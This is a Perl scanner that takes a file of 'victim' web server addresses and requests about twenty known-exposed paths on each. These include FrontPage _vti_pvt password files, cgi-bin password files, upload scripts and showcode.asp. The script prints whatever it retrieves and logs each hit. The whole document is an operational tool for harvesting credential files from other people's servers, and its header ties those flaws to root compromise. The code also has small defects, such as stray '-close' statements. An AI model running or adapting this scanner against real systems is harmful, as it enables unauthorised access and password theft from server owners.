This scanner searches for vulnerable web servers for Common Gateway Interface and Vermeer Technology Incorporated services.
3178e91d7d1afb673055f6147eac68be504e83bb41b722d15eb3a98d6d9a3647
##########################################################################
# This scanner searchs for vulnerable Common Gateway Interface and #
# Vermeer Technology Incorperated services that may lead to root level #
# security compromise. about 25% ripped from iisscan by Piffy. # #
##########################################################################
use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
my $def = new LWP::UserAgent;
my @victim;
my $userresp;
print<<__MENU;
NeoErudition Technologies
CGI VTI service scanner
By: Lawrence
http://neoerudition.net
__MENU
print qq(\n\n\nEnter Y or N to continue. [Y/N]: );
while(1) {
chomp($userresp = <STDIN>);
if($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") {
print "Proceeding...\n";
last;
} elsif($userresp eq "N" || $userresp eq "n" || $userresp eq "no") {
print "Exiting as requested.\n";
exit;
} else {
print "Thats not a valid answer. [Y/N]: ";
}
}
print qq(\nWhat file contains the victim address: );
chomp(my $victim=<STDIN>);
open(IN, $victim) || die "\nCould not open $victim: $!";
while (<IN>)
{
$victim[$a] = $_;
chomp $victim[$a];
$a++;
$b++;
}
close(IN);
$a = 0;
print qq(CGI/VTI Scan Initiated..\n);
while ($a < $b)
{
print qq(:: Checking for /_vti_pvt/service.grp\n);
my $url="http://$victim[$a]/_vti_pvt/service.grp";
my $request = new HTTP::Request('GET', $url);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/_vti_pvt/service.grp";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&second()
}
sub second() {
print qq(:: Checking for /_vti_pvt/authors.pwd\n);
my $url2="http://$victim[$a]/_vti_pvt/authors.pwd";
my $request = new HTTP::Request('GET', $url2);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/_vti_pvt/authors.pwd";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&third()
}
sub third() {
print qq(:: Checking for /cgi-bin/password.txt\n);
my $url3="http://$victim[$a]/cgi-bin/password.txt";
my $request = new HTTP::Request('GET', $url3);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/password.txt";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&fourth()
}
sub fourth() {
print qq(:: Checking for /_vti_pvt/service.pwd\n);
my $url4="http://$victim[$a]/_vti_pvt/service.pwd";
my $request = new HTTP::Request('GET', $url4);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/_vti_pvt/service.pwd";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&fifth()
}
sub fifth() {
print qq(:: Checking for /_vti_pvt/users.pwd\n);
my $url5="http://$victim[$a]/_vti_pvt/users.pwd";
my $request = new HTTP::Request('GET', $url5);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/_vti_pvt/users.pwd";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&sixth()
}
sub sixth() {
print qq(:: Checking for /_vti_pvt/administrator.pwd\n);
my $url6="http://$victim[$a]/_vti_pvt/administrator.pwd";
my $request = new HTTP::Request('GET', $url6);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/_vti_pvt/administrator.pwd";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&seventh()
}
sub seventh() {
print qq(:: Checking for /_vti_pvt/administrators.pwd\n);
my $url7="http://$victim[$a]/_vti_pvt/administrators.pwd";
my $request = new HTTP::Request('GET', $url7);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/_vti_pvt/administrators.pwd";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&eigth()
}
sub eigth() {
print qq(:: Checking for /cgi-win/uploader.exe\n);
my $url8="http://$victim[$a]/cgi-win/uploader.exe";
my $request = new HTTP::Request('GET', $url8);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-win/uploader.exe";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&nineth()
}
sub nineth() {
print qq(:: Checking for /cgi-bin/upload.pl\n);
my $url9="http://$victim[$a]/cgi-bin/upload.pl";
my $request = new HTTP::Request('GET', $url9);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/upload.pl";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&tenth()
}
sub tenth() {
print qq(:: Checking for /cgi-bin/whois_raw.cgi?\n);
my $url10="http://$victim[$a]/cgi-bin/whois_raw.cgi?";
my $request = new HTTP::Request('GET', $url10);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/whois_raw.cgi?";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&eleventh()
}
sub eleventh() {
print qq(:: Checking for /cgi-bin/passwd\n);
my $url11="http://$victim[$a]/cgi-bin/passwd";
my $request = new HTTP::Request('GET', $url11);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/passwd";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&twelth()
}
sub twelth() {
print qq(:: Checking for /cgi-bin/passwd.txt\n);
my $url12="http://$victim[$a]/cgi-bin/passwd.txt";
my $request = new HTTP::Request('GET', $url12);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/passwd.txt";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&thirteenth()
}
sub thirteenth() {
print qq(:: Checking for /cgi-bin/password\n);
my $url13="http://$victim[$a]/cgi-bin/password";
my $request = new HTTP::Request('GET', $url13);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/password";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&fourteenth()
}
sub fourteenth() {
print qq(:: Checking for /cgi-bin/password.txt\n);
my $url14="http://$victim[$a]/cgi-bin/password.txt";
my $request = new HTTP::Request('GET', $url14);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/password.txt";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&fifteenth
}
sub fifteenth() {
print qq(:: Checking for /cgi-bin/handler.cgi\n);
my $url15="http://$victim[$a]/cgi-bin/handler.cgi";
my $request = new HTTP::Request('GET', $url15);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/handler.cgi";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&sixteenth
}
sub sixteenth() {
print qq(:: Checking for /cgi-bin/handler\n);
my $url16="http://$victim[$a]/cgi-bin/handler";
my $request = new HTTP::Request('GET', $url16);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/handler";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&seventeenth
}
sub seventeenth() {
print qq(:: Checking for /cgi-bin/files.pl\n);
my $url17="http://$victim[$a]/cgi-bin/files.pl";
my $request = new HTTP::Request('GET', $url17);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/cgi-bin/files.pl";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&eigtheenth
}
sub eigtheenth() {
print qq(:: Checking for /msadc/Samples/SELECTOR/showcode.asp\n);
my $url18="http://$victim[$a]/msadc/Samples/SELECTOR/showcode.asp";
my $request = new HTTP::Request('GET', $url18);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/msadc/Samples/SELECTOR/showcode.asp";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&nineteenth
}
sub nineteenth() {
print qq(:: Checking for /msadc/Samples/selector/showcode.asp\n);
my $url19="http://$victim[$a]/msadc/Samples/selector/showcode.asp";
my $request = new HTTP::Request('GET', $url19);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/msadc/Samples/selector/showcode.asp";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
&twentieeth
}
sub twentieeth() {
print qq(:: Checking for /session/adminlogin?\n);
my $url20="http://$victim[$a]/session/adminlogin?";
my $request = new HTTP::Request('GET', $url20);
my $response = $def->request($request);
if ($response->is_success) {
print $response->content;
open(OUT, ">>cgivti.log");
print OUT "\n$victim[$a]/session/adminlogin?";
-close OUT;
} else {
print qq(Not Vulnerable..\n\n);
}
$a++;
}
<>